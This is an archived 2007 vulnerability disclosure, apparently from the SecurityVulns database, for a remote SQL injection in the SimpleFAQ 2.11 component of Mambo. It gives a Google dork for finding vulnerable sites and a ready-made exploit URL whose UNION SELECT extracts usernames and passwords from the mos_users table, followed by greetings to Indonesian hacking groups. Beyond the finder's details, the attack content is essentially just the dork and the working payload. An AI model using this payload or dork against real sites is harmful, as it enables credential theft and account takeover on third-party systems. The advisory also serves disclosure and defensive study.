Mambo Component SimpleFAQ V2.11 - Remote SQL Injection

2007-08-21T00:00:00
ID SECURITYVULNS:DOC:17851
Type securityvulns
Reporter Securityvulns
Modified 2007-08-21T00:00:00

Description

Mambo Component SimpleFAQ V2.11 - Remote SQL Injection

Vendor : http://www.parkviewconsultants.com/

Found By : k1tk4t - k1tk4t[4t]newhack.org

Location : Indonesia -- #newhack[dot]org @irc.dal.net

Dork : inurl:"index.php?option=com_simplefaq"

exploit; http://localhost/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1//union//select//0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0//from/*/mos_users/

Thanks; str0ke xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer dan semua temen2 komunitas security&hacking


-newhack[dot]org|staff- mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX


all member newhack[dot]org

all member echo.or.id

all member www.yogyafree.net

all member www.sekuritionline.net

all member www.kecoak-elektronik.net

semua komunitas hacker&security Indonesia